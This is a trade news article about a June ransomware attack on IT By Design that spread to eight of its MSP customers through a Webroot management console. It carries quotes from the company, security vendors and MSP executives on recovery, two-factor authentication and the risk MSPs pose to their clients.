IT By Design: Network Restored After Ransomware Attack That Impacted 8 Customers
“A short 48 hours later, 96 percent of affected systems are restored, and our clients are operational with minimal to no data loss,” said IT By Design in a statement.
Master MSP IT By Design has restored nearly all its compromised systems after it was hit this week by a ransomware attack that spread to eight of its customers.
The attack against IT By Design (ITBD)—a former MSP that now provides NOC, SOC and staffing services to over 250 MSPs in North America and the U.K.—hit on June 18 and was contained within 48 hours, but not before several clients were impacted.
"What I can say is that we are up and running and everything has been contained,” said Kam Attwal-Kaila, president of Jersey City, N.J.-based ITBD, when reached by phone Thursday afternoon.
[RELATED: The Wipro Breach: Why Managed Service Providers Are At Risk]
In a statement to CRN that provided additional details, ITBD said it was able to stem the attack before it spread to a large number of its MSP customers.
“Fortunately, ITBD’s strong cybersecurity protocols allowed us to detect and quarantine the ransomware with only eight total clients affected,” ITBD said in the statement. “A short 48 hours later, 96 percent of affected systems are restored, and our clients are operational with minimal to no data loss."
ITBD, which declined to name the clients affected by the attack, said it did not pay any ransomware to recover its systems.
A New York area MSP who was pitched services by ITBD, but declined to purchase them, gave the company credit for being forthcoming about the attack. He said the company offered to run his business through the ITBD network.
“You’re handing the keys to your security to somebody else, and your being told by a salesman that everything is 100 percent, that’s the danger,” he said, speaking on condition of anonymity. “This is a great case study. If I’m selling to MSPs, I have to be 100 times better at security than those clients. It could put any MSP out of business. Any product that’s sold to us, we expect them to be good at what they do, and we expect them to take security as a high priority. I don’t know how pervasive the breach was. I don’t know how much of their clients' data was affected. We don’t know if eight MSPs exposed 100 of their end-clients' data.”
The ITBD ransomware attack is yet another wakeup call for every MSP to raise its IT security policies, procedures and standards, said a top executive for a security-focused MSP who did not want to be identified.
“This scares me to death,” said the executive. “The immaturity level in the MSP marketplace on security right now is mind-boggling. If a hacker infiltrates your toolsets, all those tools you have installed on all your client’s networks are vulnerable. No one is immune to this. It could happen to anyone at any time. This is bad—really bad. And this is the tip of the iceberg. Imagine how much data exfiltration is happening right now.”
The ransomware virus was deployed through one of ITBD's "third-party providers," said ITBD in the statement.
“Early indications suggest that the virus was deployed in an automated manner through one of our third-party providers. As soon as we discovered the attack, we activated our incident response plan and immediately shut down the entire network.”
Huntress Labs, a security company that provides breach detection services to MSPs, said technology from Webroot was used to spread the ransomware. Baltimore, Md.-based Huntress Labs first made the attack public on a Reddit thread Thursday.
"Thus far, nothing suggests [Webroot was] exploited with a new software vulnerability, and we believe compromised user credentials were likely the source for most/all of the initial access," Huntress Labs said on Reddit. "As a result, we haven't advised any of our partners to stop using these products but have reiterated the importance of [two-factor authentication]."
Huntress said Webroot's management console was used to execute a PowerShell-based payload to downloaded additional malware from Pastebin.
"Please do yourself a favor and enable [two-factor authentication] on your RMM and security products. It's absolutely worth the minor inconvenience," Huntress Labs said on Reddit.
Huntress Labs did not respond to requests for comment from CRN.
In response to questions from CRN, Webroot said that its systems were not compromised by the attack. Webroot discovered the attack, which exploited "customers' weak hygiene practices," said Chad Bacher, senior vice president of products at Webroot, a Carbonite company based in Broomfield, Colo.
As a result, Webroot logged customers out and updated the company’s software to make two-factor authentication mandatory on its systems, he said.
“Webroot was not breached, and our products were not compromised,” Bacher wrote. “Recently, Webroot’s Advanced Malware Removal team discovered that a small number of customers were impacted by a threat actor exploiting a combination of customers’ weak cyber hygiene practices around authentication and RDP (Remote Desktop Protocol). To ensure the best protection for the entire Webroot customer community, we decided it is time to make two-factor authentication mandatory. We did this by conducting a console logout and software update the morning of June 20.”
The breach of ITBD comes as attacks on MSPs and software service providers are on the rise. In fact, the U.S. Department of Homeland Security last October warned that advanced persistent threat actors were on the move against MSPs.
“IT service providers generally have direct and unfettered access to their customers’ networks, and may store customer data on their own internal infrastructure,” DHS's National Cybersecurity and Communications Integration Center wrote. “By servicing a large number of customers, IT service providers can achieve significant economies of scale. However, a compromise in one part of an IT service provider’s network can have globally cascading effects, impacting other customers and introducing significant risk.”
The ITBD attack follows the April breach in which bad actors used ConnectWise Control (formerly ScreenConnect) to infiltrate 100 servers at Wipro and distribute an attack. It also follows a February breach in which an integration between ConnectWise and rival MSP platform Kaseya was exploited by cyber criminals.
“MSPs need to stop sticking their head in the sand and hiding behind a check box," said the security-focused MSP executive. "You have to be an informed shopper. Know who you are banking your business on."
Steven Burke contributed to this story.